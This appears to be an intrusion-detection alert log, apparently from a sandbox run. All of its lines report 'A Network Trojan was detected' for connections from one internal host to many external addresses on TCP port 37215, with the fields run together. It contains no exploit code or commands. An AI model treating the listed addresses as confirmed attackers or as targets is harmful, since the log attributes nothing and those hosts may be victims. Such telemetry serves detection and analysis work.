              2024-10-12T23:05:28.533093+020028352221A Network Trojan was detected192.168.2.1432778197.10.243.10737215TCP
              2024-10-12T23:05:28.534416+020028352221A Network Trojan was detected192.168.2.1454184197.65.7.24937215TCP
              2024-10-12T23:05:28.534570+020028352221A Network Trojan was detected192.168.2.1455472197.249.213.21237215TCP
              2024-10-12T23:05:28.537214+020028352221A Network Trojan was detected192.168.2.1445326197.173.66.6637215TCP
              2024-10-12T23:05:28.564266+020028352221A Network Trojan was detected192.168.2.1444882197.187.221.18337215TCP
              2024-10-12T23:05:28.566291+020028352221A Network Trojan was detected192.168.2.1452174156.112.199.22637215TCP
              2024-10-12T23:05:28.568323+020028352221A Network Trojan was detected192.168.2.1449464156.134.130.6837215TCP
              2024-10-12T23:05:28.569785+020028352221A Network Trojan was detected192.168.2.1455230197.241.159.13637215TCP
              2024-10-12T23:05:28.583376+020028352221A Network Trojan was detected192.168.2.1436126197.253.39.15437215TCP
              2024-10-12T23:05:28.595230+020028352221A Network Trojan was detected192.168.2.1446782156.13.246.13137215TCP
              2024-10-12T23:05:28.601001+020028352221A Network Trojan was detected192.168.2.1432926197.90.153.2637215TCP
              2024-10-12T23:05:28.626728+020028352221A Network Trojan was detected192.168.2.1439706156.147.64.24537215TCP
              2024-10-12T23:05:28.628334+020028352221A Network Trojan was detected192.168.2.1459130156.190.223.10837215TCP
              2024-10-12T23:05:28.632555+020028352221A Network Trojan was detected192.168.2.1454314156.61.148.11037215TCP
              2024-10-12T23:05:28.658153+020028352221A Network Trojan was detected192.168.2.1447448156.138.96.11637215TCP
              2024-10-12T23:05:28.658333+020028352221A Network Trojan was detected192.168.2.1442850156.20.76.24037215TCP
              2024-10-12T23:05:28.659520+020028352221A Network Trojan was detected192.168.2.1441530156.142.125.19537215TCP
              2024-10-12T23:05:28.659698+020028352221A Network Trojan was detected192.168.2.1448826156.166.219.23637215TCP
              2024-10-12T23:05:28.704704+020028352221A Network Trojan was detected192.168.2.1446132156.22.140.14737215TCP
              2024-10-12T23:05:28.708821+020028352221A Network Trojan was detected192.168.2.1437302156.16.202.22937215TCP
              2024-10-12T23:05:28.722644+020028352221A Network Trojan was detected192.168.2.1448976156.243.217.837215TCP
              2024-10-12T23:05:28.722766+020028352221A Network Trojan was detected192.168.2.1460756156.197.35.24737215TCP
              2024-10-12T23:05:28.736048+020028352221A Network Trojan was detected192.168.2.1451778156.19.200.19937215TCP
              2024-10-12T23:05:28.737741+020028352221A Network Trojan was detected192.168.2.1452608156.168.251.19437215TCP
              2024-10-12T23:05:28.741427+020028352221A Network Trojan was detected192.168.2.1456280156.139.171.6037215TCP
              2024-10-12T23:05:28.752409+020028352221A Network Trojan was detected192.168.2.1445796156.199.178.5037215TCP
              2024-10-12T23:05:28.769278+020028352221A Network Trojan was detected192.168.2.1436740156.128.155.21037215TCP
              2024-10-12T23:05:28.785115+020028352221A Network Trojan was detected192.168.2.1438612156.123.103.6337215TCP
              2024-10-12T23:05:28.798407+020028352221A Network Trojan was detected192.168.2.1446808156.206.126.15837215TCP
              2024-10-12T23:05:28.800892+020028352221A Network Trojan was detected192.168.2.1458158156.184.170.1337215TCP
              2024-10-12T23:05:28.802251+020028352221A Network Trojan was detected192.168.2.1433784156.212.150.8237215TCP
              2024-10-12T23:05:28.815920+020028352221A Network Trojan was detected192.168.2.1458930156.83.171.25037215TCP
              2024-10-12T23:05:28.847351+020028352221A Network Trojan was detected192.168.2.1434498156.38.222.3637215TCP
              2024-10-12T23:05:28.850934+020028352221A Network Trojan was detected192.168.2.1450524156.226.207.4337215TCP
              2024-10-12T23:05:28.864987+020028352221A Network Trojan was detected192.168.2.1450914156.30.65.2937215TCP
              2024-10-12T23:05:28.864999+020028352221A Network Trojan was detected192.168.2.1441260156.191.152.23037215TCP
              2024-10-12T23:05:28.868975+020028352221A Network Trojan was detected192.168.2.1444176156.78.203.23537215TCP
              2024-10-12T23:05:28.876665+020028352221A Network Trojan was detected192.168.2.1433186156.75.252.25137215TCP
              2024-10-12T23:05:28.876825+020028352221A Network Trojan was detected192.168.2.1453802156.195.46.19437215TCP
              2024-10-12T23:05:28.881490+020028352221A Network Trojan was detected192.168.2.1460824156.111.173.24437215TCP
              2024-10-12T23:05:28.907641+020028352221A Network Trojan was detected192.168.2.1444942156.156.183.6837215TCP
              2024-10-12T23:05:28.911860+020028352221A Network Trojan was detected192.168.2.1458008156.96.170.1637215TCP
              2024-10-12T23:05:28.912180+020028352221A Network Trojan was detected192.168.2.1442016156.40.74.13337215TCP
              2024-10-12T23:05:28.925416+020028352221A Network Trojan was detected192.168.2.1454060156.155.209.9737215TCP
              2024-10-12T23:05:28.945119+020028352221A Network Trojan was detected192.168.2.1460302156.150.54.19937215TCP
              2024-10-12T23:05:28.956522+020028352221A Network Trojan was detected192.168.2.1442198156.110.158.12937215TCP
              2024-10-12T23:05:28.974774+020028352221A Network Trojan was detected192.168.2.1455042156.244.99.10237215TCP
              2024-10-12T23:05:28.985721+020028352221A Network Trojan was detected192.168.2.1452000156.79.230.23737215TCP
              2024-10-12T23:05:29.532459+020028352221A Network Trojan was detected192.168.2.1453556197.219.58.11937215TCP
              2024-10-12T23:05:29.533107+020028352221A Network Trojan was detected192.168.2.1434374197.243.37.1537215TCP
              2024-10-12T23:05:29.533576+020028352221A Network Trojan was detected192.168.2.1444294197.201.117.9237215TCP
              2024-10-12T23:05:29.567098+020028352221A Network Trojan was detected192.168.2.1458380197.6.14.15137215TCP
              2024-10-12T23:05:29.585518+020028352221A Network Trojan was detected192.168.2.1447156197.88.143.18937215TCP
              2024-10-12T23:05:29.595170+020028352221A Network Trojan was detected192.168.2.1439664197.100.95.2737215TCP
              2024-10-12T23:05:29.596482+020028352221A Network Trojan was detected192.168.2.1458038197.212.235.24037215TCP
              2024-10-12T23:05:29.601177+020028352221A Network Trojan was detected192.168.2.1433248197.27.6.9937215TCP
              2024-10-12T23:05:29.610926+020028352221A Network Trojan was detected192.168.2.1455858197.159.73.15037215TCP
              2024-10-12T23:05:29.611703+020028352221A Network Trojan was detected192.168.2.1457800197.242.55.8937215TCP
              2024-10-12T23:05:29.615267+020028352221A Network Trojan was detected192.168.2.1443250197.222.26.3137215TCP
              2024-10-12T23:05:29.644113+020028352221A Network Trojan was detected192.168.2.1436966197.201.37.7937215TCP
              2024-10-12T23:05:29.657794+020028352221A Network Trojan was detected192.168.2.1445070197.120.175.23237215TCP
              2024-10-12T23:05:29.658012+020028352221A Network Trojan was detected192.168.2.1460216197.247.204.25437215TCP
              2024-10-12T23:05:29.658350+020028352221A Network Trojan was detected192.168.2.1443212197.38.155.17537215TCP
              2024-10-12T23:05:29.659915+020028352221A Network Trojan was detected192.168.2.1435772197.160.142.3437215TCP
              2024-10-12T23:05:29.678216+020028352221A Network Trojan was detected192.168.2.1438428197.113.104.22837215TCP
              2024-10-12T23:05:29.689821+020028352221A Network Trojan was detected192.168.2.1433512156.184.247.23437215TCP
              2024-10-12T23:05:29.736213+020028352221A Network Trojan was detected192.168.2.1438526156.254.147.7237215TCP
              2024-10-12T23:05:29.739713+020028352221A Network Trojan was detected192.168.2.1441794156.50.161.12437215TCP
              2024-10-12T23:05:29.755766+020028352221A Network Trojan was detected192.168.2.1437084156.126.255.23337215TCP
              2024-10-12T23:05:29.771024+020028352221A Network Trojan was detected192.168.2.1442478156.116.126.12137215TCP
              2024-10-12T23:05:29.772765+020028352221A Network Trojan was detected192.168.2.1447454156.36.224.7337215TCP
              2024-10-12T23:05:29.782917+020028352221A Network Trojan was detected192.168.2.1459800156.137.250.2637215TCP
              2024-10-12T23:05:29.784608+020028352221A Network Trojan was detected192.168.2.1433372156.169.127.15037215TCP
              2024-10-12T23:05:29.784694+020028352221A Network Trojan was detected192.168.2.1438070156.192.23.22837215TCP
              2024-10-12T23:05:29.788453+020028352221A Network Trojan was detected192.168.2.1452018156.127.194.5537215TCP
              2024-10-12T23:05:29.814204+020028352221A Network Trojan was detected192.168.2.1443766156.213.144.7937215TCP
              2024-10-12T23:05:29.831364+020028352221A Network Trojan was detected192.168.2.1440172156.204.161.20337215TCP
              2024-10-12T23:05:29.846058+020028352221A Network Trojan was detected192.168.2.1446002156.69.250.8337215TCP
              2024-10-12T23:05:29.860540+020028352221A Network Trojan was detected192.168.2.1434234156.213.125.6237215TCP
              2024-10-12T23:05:29.860818+020028352221A Network Trojan was detected192.168.2.1451502156.66.17.4837215TCP
              2024-10-12T23:05:29.862513+020028352221A Network Trojan was detected192.168.2.1458840156.135.204.9537215TCP
              2024-10-12T23:05:29.864654+020028352221A Network Trojan was detected192.168.2.1448580156.113.1.25137215TCP
              2024-10-12T23:05:29.866672+020028352221A Network Trojan was detected192.168.2.1433844156.41.240.11537215TCP
              2024-10-12T23:05:29.907814+020028352221A Network Trojan was detected192.168.2.1445772156.55.28.10237215TCP
              2024-10-12T23:05:29.909850+020028352221A Network Trojan was detected192.168.2.1439916156.209.146.11537215TCP
              2024-10-12T23:05:29.913513+020028352221A Network Trojan was detected192.168.2.1439026156.126.240.25037215TCP
              2024-10-12T23:05:29.939049+020028352221A Network Trojan was detected192.168.2.1436684156.184.54.23837215TCP
              2024-10-12T23:05:29.960398+020028352221A Network Trojan was detected192.168.2.1443462156.241.48.25237215TCP
              2024-10-12T23:05:29.972130+020028352221A Network Trojan was detected192.168.2.1448154156.184.138.1837215TCP
              2024-10-12T23:05:29.974191+020028352221A Network Trojan was detected192.168.2.1455346156.81.174.16737215TCP
              2024-10-12T23:05:29.986219+020028352221A Network Trojan was detected192.168.2.1443992156.241.151.3737215TCP
              2024-10-12T23:05:29.992054+020028352221A Network Trojan was detected192.168.2.1451930156.113.246.13437215TCP
              2024-10-12T23:05:29.992187+020028352221A Network Trojan was detected192.168.2.1458784156.45.166.6537215TCP
              2024-10-12T23:05:30.796544+020028352221A Network Trojan was detected192.168.2.1455452197.179.21.21837215TCP
              2024-10-12T23:05:30.796544+020028352221A Network Trojan was detected192.168.2.1454958197.2.231.6037215TCP
              2024-10-12T23:05:30.796565+020028352221A Network Trojan was detected192.168.2.1436926197.143.212.13937215TCP
              2024-10-12T23:05:30.796603+020028352221A Network Trojan was detected192.168.2.1433362197.17.198.4137215TCP
              2024-10-12T23:05:30.796609+020028352221A Network Trojan was detected192.168.2.1450290197.140.64.7637215TCP
              2024-10-12T23:05:30.796637+020028352221A Network Trojan was detected192.168.2.1434502197.77.197.16937215TCP
              2024-10-12T23:05:30.797067+020028352221A Network Trojan was detected192.168.2.1455696197.52.211.5037215TCP
              2024-10-12T23:05:31.594988+020028352221A Network Trojan was detected192.168.2.1459258156.89.173.5037215TCP
              2024-10-12T23:05:31.611030+020028352221A Network Trojan was detected192.168.2.1436422156.164.145.1937215TCP
              2024-10-12T23:05:31.632478+020028352221A Network Trojan was detected192.168.2.1436026156.108.12.9837215TCP
              2024-10-12T23:05:31.657401+020028352221A Network Trojan was detected192.168.2.1434274156.8.188.10537215TCP
              2024-10-12T23:05:31.657636+020028352221A Network Trojan was detected192.168.2.1435728156.199.175.16337215TCP
              2024-10-12T23:05:31.664170+020028352221A Network Trojan was detected192.168.2.1459910156.204.42.10637215TCP
              2024-10-12T23:05:31.689061+020028352221A Network Trojan was detected192.168.2.1455026156.110.142.4637215TCP
              2024-10-12T23:05:31.692000+020028352221A Network Trojan was detected192.168.2.1435706156.131.75.24637215TCP
              2024-10-12T23:05:31.721063+020028352221A Network Trojan was detected192.168.2.1441102156.79.72.23237215TCP
              2024-10-12T23:05:31.898119+020028352221A Network Trojan was detected192.168.2.1436016156.115.254.16037215TCP
              2024-10-12T23:05:31.912124+020028352221A Network Trojan was detected192.168.2.1451414156.21.26.4037215TCP
              2024-10-12T23:05:31.939344+020028352221A Network Trojan was detected192.168.2.1457694156.236.29.2837215TCP
              2024-10-12T23:05:31.939725+020028352221A Network Trojan was detected192.168.2.1452214156.168.189.8637215TCP
              2024-10-12T23:05:31.955472+020028352221A Network Trojan was detected192.168.2.1453744156.68.214.16737215TCP
              2024-10-12T23:05:31.987810+020028352221A Network Trojan was detected192.168.2.1453300156.94.60.22337215TCP
              2024-10-12T23:05:31.989768+020028352221A Network Trojan was detected192.168.2.1459324156.5.127.9037215TCP
              2024-10-12T23:05:32.626132+020028352221A Network Trojan was detected192.168.2.1446484197.11.5.8237215TCP
              2024-10-12T23:05:32.626683+020028352221A Network Trojan was detected192.168.2.1433370156.44.50.13837215TCP
              2024-10-12T23:05:32.644023+020028352221A Network Trojan was detected192.168.2.1451316197.70.21.17037215TCP
              2024-10-12T23:05:32.644397+020028352221A Network Trojan was detected192.168.2.1438130197.60.232.7737215TCP
              2024-10-12T23:05:32.645095+020028352221A Network Trojan was detected192.168.2.1456332197.248.255.18437215TCP
              2024-10-12T23:05:32.645123+020028352221A Network Trojan was detected192.168.2.1453712197.120.162.22737215TCP
              2024-10-12T23:05:32.649067+020028352221A Network Trojan was detected192.168.2.1436904156.114.202.1137215TCP
              2024-10-12T23:05:32.657835+020028352221A Network Trojan was detected192.168.2.1438574197.55.166.15037215TCP
              2024-10-12T23:05:32.657874+020028352221A Network Trojan was detected192.168.2.1440248156.111.169.8437215TCP
              2024-10-12T23:05:32.661628+020028352221A Network Trojan was detected192.168.2.1450762197.162.83.16437215TCP
              2024-10-12T23:05:32.662558+020028352221A Network Trojan was detected192.168.2.1458650197.62.241.25037215TCP
              2024-10-12T23:05:32.662570+020028352221A Network Trojan was detected192.168.2.1442594197.144.148.12237215TCP
              2024-10-12T23:05:32.663487+020028352221A Network Trojan was detected192.168.2.1455340197.121.104.20737215TCP
              2024-10-12T23:05:32.675398+020028352221A Network Trojan was detected192.168.2.1443434197.48.227.6537215TCP
              2024-10-12T23:05:32.714060+020028352221A Network Trojan was detected192.168.2.1435860197.113.159.17437215TCP
              2024-10-12T23:05:33.298097+020028352221A Network Trojan was detected192.168.2.1434664156.239.68.13237215TCP
              2024-10-12T23:05:33.479377+020028352221A Network Trojan was detected192.168.2.1445372197.9.132.19237215TCP
              2024-10-12T23:05:33.703853+020028352221A Network Trojan was detected192.168.2.1446826197.210.189.17837215TCP
              2024-10-12T23:05:34.690710+020028352221A Network Trojan was detected192.168.2.1434354156.118.15.7737215TCP
              2024-10-12T23:05:34.723075+020028352221A Network Trojan was detected192.168.2.1459592156.83.8.13637215TCP
              2024-10-12T23:05:34.725142+020028352221A Network Trojan was detected192.168.2.1455860156.204.247.20037215TCP
              2024-10-12T23:05:34.736858+020028352221A Network Trojan was detected192.168.2.1457384156.64.187.11337215TCP
              2024-10-12T23:05:34.737521+020028352221A Network Trojan was detected192.168.2.1455344156.220.51.24037215TCP
              2024-10-12T23:05:34.744549+020028352221A Network Trojan was detected192.168.2.1435602156.110.174.5437215TCP
              2024-10-12T23:05:34.745243+020028352221A Network Trojan was detected192.168.2.1460068156.32.227.13237215TCP
              2024-10-12T23:05:34.747800+020028352221A Network Trojan was detected192.168.2.1440394197.208.28.24937215TCP
              2024-10-12T23:05:34.747843+020028352221A Network Trojan was detected192.168.2.1448842197.107.133.1337215TCP
              2024-10-12T23:05:34.751593+020028352221A Network Trojan was detected192.168.2.1455116156.119.203.24637215TCP
              2024-10-12T23:05:34.783419+020028352221A Network Trojan was detected192.168.2.1442024156.220.126.6737215TCP
              2024-10-12T23:05:34.788738+020028352221A Network Trojan was detected192.168.2.1442714156.121.132.21537215TCP
              2024-10-12T23:05:34.800380+020028352221A Network Trojan was detected192.168.2.1436078156.14.75.20137215TCP
              2024-10-12T23:05:34.814297+020028352221A Network Trojan was detected192.168.2.1434194156.97.142.17037215TCP
              2024-10-12T23:05:34.815246+020028352221A Network Trojan was detected192.168.2.1440262156.82.20.9037215TCP
              2024-10-12T23:05:34.816019+020028352221A Network Trojan was detected192.168.2.1434570156.36.147.11537215TCP
              2024-10-12T23:05:34.816757+020028352221A Network Trojan was detected192.168.2.1455934156.200.147.25537215TCP
              2024-10-12T23:05:34.939449+020028352221A Network Trojan was detected192.168.2.1455234156.94.213.18437215TCP
              2024-10-12T23:05:34.954944+020028352221A Network Trojan was detected192.168.2.1457438156.181.229.3637215TCP
              2024-10-12T23:05:34.973186+020028352221A Network Trojan was detected192.168.2.1448138156.156.19.10637215TCP
              2024-10-12T23:05:34.985961+020028352221A Network Trojan was detected192.168.2.1438582156.251.76.23137215TCP
              2024-10-12T23:05:34.986080+020028352221A Network Trojan was detected192.168.2.1448678156.57.106.21537215TCP
              2024-10-12T23:05:34.987786+020028352221A Network Trojan was detected192.168.2.1451898156.232.215.20537215TCP
              2024-10-12T23:05:34.989948+020028352221A Network Trojan was detected192.168.2.1443626156.217.229.22237215TCP
              2024-10-12T23:05:34.990152+020028352221A Network Trojan was detected192.168.2.1442324156.234.40.7937215TCP
              2024-10-12T23:05:34.991996+020028352221A Network Trojan was detected192.168.2.1459558156.182.190.14837215TCP
              2024-10-12T23:05:35.002073+020028352221A Network Trojan was detected192.168.2.1448840156.180.29.13037215TCP
              2024-10-12T23:05:35.017932+020028352221A Network Trojan was detected192.168.2.1436834156.147.252.15337215TCP
              2024-10-12T23:05:35.019032+020028352221A Network Trojan was detected192.168.2.1435326156.196.232.25537215TCP
              2024-10-12T23:05:35.022829+020028352221A Network Trojan was detected192.168.2.1459800156.67.247.2637215TCP
              2024-10-12T23:05:35.022956+020028352221A Network Trojan was detected192.168.2.1447880156.74.148.10237215TCP
              2024-10-12T23:05:35.034767+020028352221A Network Trojan was detected192.168.2.1446816156.162.226.20237215TCP
              2024-10-12T23:05:35.038639+020028352221A Network Trojan was detected192.168.2.1452080156.250.165.25537215TCP
              2024-10-12T23:05:35.038785+020028352221A Network Trojan was detected192.168.2.1434436156.38.238.24037215TCP
              2024-10-12T23:05:35.048868+020028352221A Network Trojan was detected192.168.2.1432912156.8.111.21537215TCP
              2024-10-12T23:05:35.054328+020028352221A Network Trojan was detected192.168.2.1454064156.240.110.22737215TCP
              2024-10-12T23:05:35.705115+020028352221A Network Trojan was detected192.168.2.1460774156.60.155.25337215TCP
              2024-10-12T23:05:35.720538+020028352221A Network Trojan was detected192.168.2.1437020156.155.141.9337215TCP
              2024-10-12T23:05:35.722358+020028352221A Network Trojan was detected192.168.2.1440660156.172.127.20437215TCP
              2024-10-12T23:05:35.736119+020028352221A Network Trojan was detected192.168.2.1451002156.20.16.6337215TCP
              2024-10-12T23:05:35.740198+020028352221A Network Trojan was detected192.168.2.1452050156.118.188.737215TCP
              2024-10-12T23:05:35.782899+020028352221A Network Trojan was detected192.168.2.1458158156.133.222.1237215TCP
              2024-10-12T23:05:35.784820+020028352221A Network Trojan was detected192.168.2.1441480156.129.23.23237215TCP
              2024-10-12T23:05:35.786698+020028352221A Network Trojan was detected192.168.2.1460804156.126.46.21537215TCP
              2024-10-12T23:05:35.815477+020028352221A Network Trojan was detected192.168.2.1454056197.215.206.15737215TCP
              2024-10-12T23:05:35.818176+020028352221A Network Trojan was detected192.168.2.1458530197.244.57.21637215TCP
              2024-10-12T23:05:35.818355+020028352221A Network Trojan was detected192.168.2.1459714197.80.183.16637215TCP
              2024-10-12T23:05:35.846567+020028352221A Network Trojan was detected192.168.2.1446528156.137.245.2637215TCP
              2024-10-12T23:05:35.846582+020028352221A Network Trojan was detected192.168.2.1433814197.115.20.9737215TCP
              2024-10-12T23:05:35.861209+020028352221A Network Trojan was detected192.168.2.1436470197.1.183.3537215TCP
              2024-10-12T23:05:35.861360+020028352221A Network Trojan was detected192.168.2.1457816197.168.196.22637215TCP
              2024-10-12T23:05:35.878778+020028352221A Network Trojan was detected192.168.2.1460696197.249.27.12437215TCP
              2024-10-12T23:05:35.898788+020028352221A Network Trojan was detected192.168.2.1439654197.52.206.11937215TCP
              2024-10-12T23:05:35.909292+020028352221A Network Trojan was detected192.168.2.1434472197.29.94.16437215TCP
              2024-10-12T23:05:35.911167+020028352221A Network Trojan was detected192.168.2.1450096197.136.26.22337215TCP
              2024-10-12T23:05:35.924547+020028352221A Network Trojan was detected192.168.2.1456222197.19.112.13637215TCP
              2024-10-12T23:05:35.941082+020028352221A Network Trojan was detected192.168.2.1447192197.143.237.8537215TCP
              2024-10-12T23:05:35.941232+020028352221A Network Trojan was detected192.168.2.1450498197.98.143.8437215TCP
              2024-10-12T23:05:35.941737+020028352221A Network Trojan was detected192.168.2.1452186197.192.26.15737215TCP
              2024-10-12T23:05:35.986436+020028352221A Network Trojan was detected192.168.2.1450712197.55.254.1537215TCP
              2024-10-12T23:05:35.986719+020028352221A Network Trojan was detected192.168.2.1438740197.246.76.13437215TCP
              2024-10-12T23:05:35.988054+020028352221A Network Trojan was detected192.168.2.1439986197.24.213.22637215TCP
              2024-10-12T23:05:35.990136+020028352221A Network Trojan was detected192.168.2.1445616197.176.129.21737215TCP
              2024-10-12T23:05:36.019162+020028352221A Network Trojan was detected192.168.2.1437706197.165.14.10637215TCP
              2024-10-12T23:05:36.032358+020028352221A Network Trojan was detected192.168.2.1455290197.33.1.10937215TCP
              2024-10-12T23:05:36.033181+020028352221A Network Trojan was detected192.168.2.1444080197.45.238.7737215TCP
              2024-10-12T23:05:36.033673+020028352221A Network Trojan was detected192.168.2.1453760197.30.246.25537215TCP
              2024-10-12T23:05:36.036907+020028352221A Network Trojan was detected192.168.2.1447680197.246.45.13537215TCP
              2024-10-12T23:05:36.036957+020028352221A Network Trojan was detected192.168.2.1436432197.247.51.2437215TCP
              2024-10-12T23:05:36.065019+020028352221A Network Trojan was detected192.168.2.1442252197.86.111.17937215TCP
              2024-10-12T23:05:36.079763+020028352221A Network Trojan was detected192.168.2.1436080197.21.250.10837215TCP
              2024-10-12T23:05:36.081472+020028352221A Network Trojan was detected192.168.2.1449440197.171.113.12037215TCP
              2024-10-12T23:05:36.085371+020028352221A Network Trojan was detected192.168.2.1435286197.98.85.15837215TCP
              2024-10-12T23:05:36.095860+020028352221A Network Trojan was detected192.168.2.1455886197.236.78.24137215TCP
              2024-10-12T23:05:36.097541+020028352221A Network Trojan was detected192.168.2.1447822197.243.207.19237215TCP
              2024-10-12T23:05:36.111521+020028352221A Network Trojan was detected192.168.2.1442476197.144.44.537215TCP
              2024-10-12T23:05:36.113167+020028352221A Network Trojan was detected192.168.2.1459162197.145.224.24437215TCP
              2024-10-12T23:05:36.142144+020028352221A Network Trojan was detected192.168.2.1435518197.255.240.11837215TCP
              2024-10-12T23:05:36.158624+020028352221A Network Trojan was detected192.168.2.1436690197.149.86.1537215TCP
              2024-10-12T23:05:36.159654+020028352221A Network Trojan was detected192.168.2.1439368197.161.66.1537215TCP
              2024-10-12T23:05:36.161678+020028352221A Network Trojan was detected192.168.2.1433914197.209.91.3837215TCP
              2024-10-12T23:05:36.161824+020028352221A Network Trojan was detected192.168.2.1448348197.186.52.12937215TCP
              2024-10-12T23:05:36.189221+020028352221A Network Trojan was detected192.168.2.1452120197.152.221.2337215TCP
              2024-10-12T23:05:36.189811+020028352221A Network Trojan was detected192.168.2.1433620197.47.126.1337215TCP
              2024-10-12T23:05:36.190802+020028352221A Network Trojan was detected192.168.2.1446124197.156.140.16037215TCP
              2024-10-12T23:05:36.204835+020028352221A Network Trojan was detected192.168.2.1449780197.55.241.5037215TCP
              2024-10-12T23:05:36.251332+020028352221A Network Trojan was detected192.168.2.1438410197.158.158.8537215TCP
              2024-10-12T23:05:36.816977+020028352221A Network Trojan was detected192.168.2.1457688197.8.234.11937215TCP
              2024-10-12T23:05:36.831934+020028352221A Network Trojan was detected192.168.2.1433942156.169.53.5137215TCP
              2024-10-12T23:05:36.832510+020028352221A Network Trojan was detected192.168.2.1459014197.148.71.10737215TCP
              2024-10-12T23:05:36.880623+020028352221A Network Trojan was detected192.168.2.1441012197.170.153.12837215TCP
              2024-10-12T23:05:36.910607+020028352221A Network Trojan was detected192.168.2.1459782197.67.48.17337215TCP
              2024-10-12T23:05:36.910608+020028352221A Network Trojan was detected192.168.2.1444348197.234.213.21737215TCP
              2024-10-12T23:05:36.914032+020028352221A Network Trojan was detected192.168.2.1449066197.90.20.17737215TCP
              2024-10-12T23:05:36.930373+020028352221A Network Trojan was detected192.168.2.1447784197.30.21.22337215TCP
              2024-10-12T23:05:36.956550+020028352221A Network Trojan was detected192.168.2.1460990197.202.85.15737215TCP
              2024-10-12T23:05:36.956856+020028352221A Network Trojan was detected192.168.2.1449222197.101.195.3737215TCP
              2024-10-12T23:05:36.970467+020028352221A Network Trojan was detected192.168.2.1458720197.30.158.6637215TCP
              2024-10-12T23:05:37.003790+020028352221A Network Trojan was detected192.168.2.1458300197.247.235.8437215TCP
              2024-10-12T23:05:37.007906+020028352221A Network Trojan was detected192.168.2.1456140197.217.171.6437215TCP
              2024-10-12T23:05:37.116618+020028352221A Network Trojan was detected192.168.2.1446112197.241.124.23437215TCP
              2024-10-12T23:05:37.127721+020028352221A Network Trojan was detected192.168.2.1452286197.26.1.1037215TCP
              2024-10-12T23:05:37.127781+020028352221A Network Trojan was detected192.168.2.1446970197.42.120.19837215TCP
              2024-10-12T23:05:37.163678+020028352221A Network Trojan was detected192.168.2.1442938197.22.43.18037215TCP
              2024-10-12T23:05:37.193483+020028352221A Network Trojan was detected192.168.2.1445840197.54.244.5537215TCP
              2024-10-12T23:05:37.220694+020028352221A Network Trojan was detected192.168.2.1451862197.216.142.8437215TCP
              2024-10-12T23:05:37.220959+020028352221A Network Trojan was detected192.168.2.1438260197.135.111.25137215TCP
              2024-10-12T23:05:37.224608+020028352221A Network Trojan was detected192.168.2.1456380197.79.239.11837215TCP
              2024-10-12T23:05:37.251497+020028352221A Network Trojan was detected192.168.2.1453160197.159.191.22537215TCP
              2024-10-12T23:05:37.271489+020028352221A Network Trojan was detected192.168.2.1460858197.107.236.24237215TCP
              2024-10-12T23:05:37.752021+020028352221A Network Trojan was detected192.168.2.1459016156.105.77.13737215TCP
              2024-10-12T23:05:37.752255+020028352221A Network Trojan was detected192.168.2.1434616156.45.57.11737215TCP
              2024-10-12T23:05:37.752390+020028352221A Network Trojan was detected192.168.2.1459178156.44.73.9537215TCP
              2024-10-12T23:05:37.769135+020028352221A Network Trojan was detected192.168.2.1441148156.45.246.18937215TCP
              2024-10-12T23:05:37.771155+020028352221A Network Trojan was detected192.168.2.1454542156.60.168.1237215TCP
              2024-10-12T23:05:37.788666+020028352221A Network Trojan was detected192.168.2.1438792156.191.168.2637215TCP
              2024-10-12T23:05:37.800776+020028352221A Network Trojan was detected192.168.2.1445246197.185.94.3837215TCP
              2024-10-12T23:05:37.814974+020028352221A Network Trojan was detected192.168.2.1433202156.195.107.12537215TCP
              2024-10-12T23:05:37.817972+020028352221A Network Trojan was detected192.168.2.1453486156.166.229.15237215TCP
              2024-10-12T23:05:37.833572+020028352221A Network Trojan was detected192.168.2.1445448197.140.244.6637215TCP
              2024-10-12T23:05:37.845768+020028352221A Network Trojan was detected192.168.2.1451358197.186.156.12937215TCP
              2024-10-12T23:05:37.847295+020028352221A Network Trojan was detected192.168.2.1434428197.200.24.6737215TCP
              2024-10-12T23:05:37.849460+020028352221A Network Trojan was detected192.168.2.1445100197.143.47.21037215TCP
              2024-10-12T23:05:37.861163+020028352221A Network Trojan was detected192.168.2.1437294197.146.1.17437215TCP
              2024-10-12T23:05:37.861182+020028352221A Network Trojan was detected192.168.2.1444578156.150.86.9337215TCP
              2024-10-12T23:05:37.907479+020028352221A Network Trojan was detected192.168.2.1436020197.166.87.12737215TCP
              2024-10-12T23:05:37.909976+020028352221A Network Trojan was detected192.168.2.1460418197.13.146.9037215TCP
              2024-10-12T23:05:37.940476+020028352221A Network Trojan was detected192.168.2.1445132197.139.158.1637215TCP
              2024-10-12T23:05:37.942112+020028352221A Network Trojan was detected192.168.2.1458150197.62.251.16437215TCP
              2024-10-12T23:05:37.960719+020028352221A Network Trojan was detected192.168.2.1457996197.222.229.12637215TCP
              2024-10-12T23:05:38.064380+020028352221A Network Trojan was detected192.168.2.1433322156.240.112.13137215TCP
              2024-10-12T23:05:38.066115+020028352221A Network Trojan was detected192.168.2.1460372156.197.2.737215TCP
              2024-10-12T23:05:38.068679+020028352221A Network Trojan was detected192.168.2.1443568156.151.140.13737215TCP
              2024-10-12T23:05:38.068680+020028352221A Network Trojan was detected192.168.2.1438318156.139.181.11037215TCP
              2024-10-12T23:05:38.099497+020028352221A Network Trojan was detected192.168.2.1454298156.164.199.5637215TCP
              2024-10-12T23:05:38.815568+020028352221A Network Trojan was detected192.168.2.1448064197.188.55.15737215TCP
              2024-10-12T23:05:38.829841+020028352221A Network Trojan was detected192.168.2.1456274197.44.144.15237215TCP
              2024-10-12T23:05:38.829996+020028352221A Network Trojan was detected192.168.2.1436364197.17.45.14337215TCP
              2024-10-12T23:05:38.830040+020028352221A Network Trojan was detected192.168.2.1455634197.163.152.10737215TCP
              2024-10-12T23:05:38.830401+020028352221A Network Trojan was detected192.168.2.1434012197.191.209.11437215TCP
              2024-10-12T23:05:38.830405+020028352221A Network Trojan was detected192.168.2.1441628197.157.204.6037215TCP
              2024-10-12T23:05:38.831523+020028352221A Network Trojan was detected192.168.2.1451518197.186.132.20937215TCP
              2024-10-12T23:05:38.831677+020028352221A Network Trojan was detected192.168.2.1460652197.115.194.4737215TCP
              2024-10-12T23:05:38.831805+020028352221A Network Trojan was detected192.168.2.1452856197.190.196.6037215TCP
              2024-10-12T23:05:38.831926+020028352221A Network Trojan was detected192.168.2.1447098197.165.217.17637215TCP
              2024-10-12T23:05:38.831961+020028352221A Network Trojan was detected192.168.2.1440004197.138.220.19937215TCP
              2024-10-12T23:05:38.833554+020028352221A Network Trojan was detected192.168.2.1452380197.187.66.13137215TCP
              2024-10-12T23:05:38.833560+020028352221A Network Trojan was detected192.168.2.1456570197.22.57.7937215TCP
              2024-10-12T23:05:38.833794+020028352221A Network Trojan was detected192.168.2.1441542197.176.101.3437215TCP
